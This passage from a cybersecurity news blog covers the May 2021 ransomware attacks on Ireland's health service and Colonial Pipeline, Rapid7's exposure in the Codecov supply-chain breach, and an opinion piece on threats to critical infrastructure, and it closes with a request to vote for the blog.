The authorities launched an investigation into the incident, which began at around 4.30am on Friday; government experts are working to determine the extent of the security breach.

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

Experts fear that, as a result of the ransomware attack, there will be cancellations and disruption to services at multiple hospitals in the country.

According to the Associated Press, Dublin’s Rotunda maternity hospital said it was canceling most routine appointments due to the IT issues, calling the situation a “critical emergency.” The attack was classified as “fairly sophisticated” by professionals involved in the investigation into the incident.

Minister for Health Stephen Donnelly declared that the situation was having “a severe impact” on national healthcare services.

“We are working to ensure that the systems and the information is protected. Covid-19 testing and vaccinations are continuing as planned today,” he said.

At the time of this writing, Ireland’s Health Service Executive has yet to receive a ransom demand.

The attack highlights the importance of protecting critical infrastructure from cyber attacks carried out by cybercriminals and nation-state actors.

Pierluigi Paganini

(SecurityAffairs – hacking, Ireland Health Service Executive)

Colonial Pipeline likely paid a $5M ransom to DarkSide

14 May 2021 at 10:13

DarkSide demanded a $5 million ransom from Colonial Pipeline, which has quickly recovered operations. Did it pay?

The Colonial Pipeline facility in Pelham, Alabama, was hit by a cyber attack on Friday, and its operators were forced to shut down its systems. The pipeline carries 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, covering 45 percent of the East Coast’s fuel supplies.

“The operator of the system, Colonial Pipeline, said in a statement late Friday that it had shut down its 5,500 miles of pipeline, which it says carries 45 percent of the East Coast’s fuel supplies, in an effort to contain the breach on its computer networks. Earlier Friday, there were disruptions along the pipeline, but it was unclear whether that was a direct result of the attack.” reported The New York Times.

Earlier this week, the U.S. Federal Bureau of Investigation confirmed that the Colonial Pipeline was shut down due to a cyber attack carried out by the Darkside ransomware gang.

Colonial Pipeline has recovered quickly from the ransomware attack; all of its infrastructure was restarted today.

Colonial Pipeline can now report that we have restarted our entire pipeline system and that product delivery has commenced to all markets we serve. https://t.co/kpWNw0UQve pic.twitter.com/9r5hA2CLNn

— Colonial Pipeline (@Colpipe) May 13, 2021

Multiple media, citing people familiar with the matter, reported that the company had initially refused to pay the ransom.

However, the quick restoration of operations is suspicious and suggests that the operators of the Colonial Pipeline paid the ransom.

The New York Times reported that Colonial Pipeline paid the hackers almost $5 million worth of cryptocurrency to receive a decryption key that allowed it to restore the encrypted files. Because the tool was too slow, the company also used its backups to restore the systems.

“The operator of a critical fuel pipeline on the East Coast paid extortionists roughly 75 Bitcoin — or nearly $5 million — to recover its stolen data, according to people briefed on the transaction, clearing the way for gas to begin flowing again but complicating President Biden’s efforts to deter future attacks.” reported the NYT.

“Colonial Pipeline made the ransom payment to the hacking group DarkSide after the cybercriminals last week held up the company’s business networks with ransomware, a form of malware that encrypts data until the victim pays, and threatened to release it online.”

According to the media, once the company had obtained the decryption key, it used it along with its backup system to quickly restore the impacted systems and resume pipeline operations.

Pierluigi Paganini

(SecurityAffairs – hacking, Colonial Pipeline)

Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack

14 May 2021 at 06:19

Rapid7 disclosed that an unauthorized third party had access to source code and customer data as a result of the Codecov supply chain attack.

Cyber security vendor Rapid7 revealed it was impacted by the Codecov software supply chain attack: attackers had access to data for some of its customers and to a small subset of its source code repositories for internal tools.

In April, the software company Codecov disclosed a major security breach after a threat actor compromised its infrastructure to inject credential-harvesting code into one of its tools, named Bash Uploader.

The threat actor gained periodic access to the Bash Uploader script, making changes to add malicious code. The malicious code allowed the attacker to intercept uploads and scan and collect sensitive information, including credentials, tokens, or keys.

Codecov is one of the major code coverage companies; it provides code testing solutions to a broad range of organizations, including Atlassian, P&G, GoDaddy, and the Washington Post.

The security breach took place on January 31, but it was discovered only on April 1st by one of Codecov’s customers.

Shortly after the disclosure of the Codecov supply chain attack, Rapid7 launched an internal investigation to determine the potential impact on its infrastructure. The experts found that:

  • A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
  • These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
  • No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made

The repositories accessed by the third party contained internal credentials and alert-related data for a subset of its MDR (managed detection and response) customers. In response to the breach, the company reset the impacted credentials.

“We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email [email protected]” concludes Rapid7.

Pierluigi Paganini

(SecurityAffairs – hacking, supply chain attack)

Security at Bay: Critical Infrastructure Under Attack

13 May 2021 at 20:16

The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide.

The attack perpetrated by hackers on the oil company Colonial Pipeline highlights the dangers facing Industrial Control Systems (ICS) and the need for change in the information security landscape.

The attack took place on May 7th, when hackers used ransomware to cripple the company’s defenses. As a result, all operations were forced to shut down, as well as the operating systems used by the company. A group named DarkSide claimed responsibility for the Colonial Pipeline attack.

The hacker group has been active since August and is part of a professional crime industry that has caused billions of dollars of damage. President Biden has delivered remarks pointing to the involvement of Russia in the development of the ransomware. It is not clear whether the Colonial company has paid the demands.

The attack brought to light how vulnerable critical national infrastructure (CNI) is, and the need for new methodologies to address threats that are evolving on a daily basis in many different ways. As far as we know, this attack has shown that the understanding of information security has become outdated, as have the solutions that were supposed to protect company assets.

The impact of the attack was far beyond what was expected. Consumers were directly hit by a hike in prices. Also, in the Southeast, some drivers started stocking up as available fuel ran low at gas stations. About 5,500 miles of pipeline were shut down; in numbers, that represents 45% of the fuel consumed from Texas to New York.

As reported by Recorded Future, ransomware attack groups are gaining momentum and spreading throughout every sector. From industry to education, everyone is a ransomware target. It is important to notice that hackers publish part of the stolen data and demand money not to publish the rest.

While the United States leads in ransomware attacks, hackers are aiming to make victims of other countries as well. Freedom and security are deeply rooted in the American dream, but today the whole nation sees these rights eroded by the dangers of information security.

The US Department of Justice and a group of companies have created a task force to manage the issue of the ransomware threat. However, the tools released by the Equation Group in the past can be the tipping point for new attacks or for the development of new ways to bypass known protections.

Little is known yet about how the company was breached, but it is certain that the goal was to obtain money rather than corrupt the system. Some parts of the system were restored, and the company said it will update its systems. Part of its operations are manual at this time, but it is not certain when supplies will return to normal.

The question now is whether the available supplies will be enough. The disruption of supplies could have an impact on many sectors. Bitdefender released a decryption tool in January for an older version of the ransomware, but said that the tool does not work for this new version. According to Bloomberg, 100GB was stolen in just two hours. This is a remarkable event, to be considered the largest and most successful act of cyberwarfare.

Finally, we need to develop new systems and new technologies, as this could be the start of a surge of new threat actors and new attacks that cannot be stopped by current protection solutions.

Sources:

https://therecord.media/ransomware-tracker-threat-groups-focus-on-vulnerable-targets/

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/

https://www.bbc.com/news/business-57081386

https://www.bbc.com/news/business-57050690

https://www.computerweekly.com/news/252500508/Colonial-Pipeline-ransomware-attack-has-grave-consequences

https://www.databreachtoday.com/colonial-pipeline-attack-all-monsters-are-human-a-16568

https://www.cbsnews.com/news/colonial-pipeline-ransomware-attack-darkside-criminal-gang/

https://www.bloomberg.com/news/articles/2021-05-09/colonial-hackers-stole-data-thursday-ahead-of-pipeline-shutdown

About the author Luis Nakamoto

Luis Nakamoto is a Computer Science student of Cryptology and an enthusiast of information security, having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse engineering. He is also a prolific and compulsive writer, contributing to Portal Tic from Sebrae Nacional.

Pierluigi Paganini

(SecurityAffairs – hacking, Critical Infrastructure)

Please vote Security Affairs – 1 day left

13 May 2021 at 18:38

Hi Guys
I need your support. I became aware only now that we can nominate SecurityAffairs as Best Personal Blog.

I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link

https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

The URL is https://securityaffairs.co/

and indicate Pierluigi Paganini as the reference

Thank you!
Pierluigi

Pierluigi Paganini

(SecurityAffairs – hacking)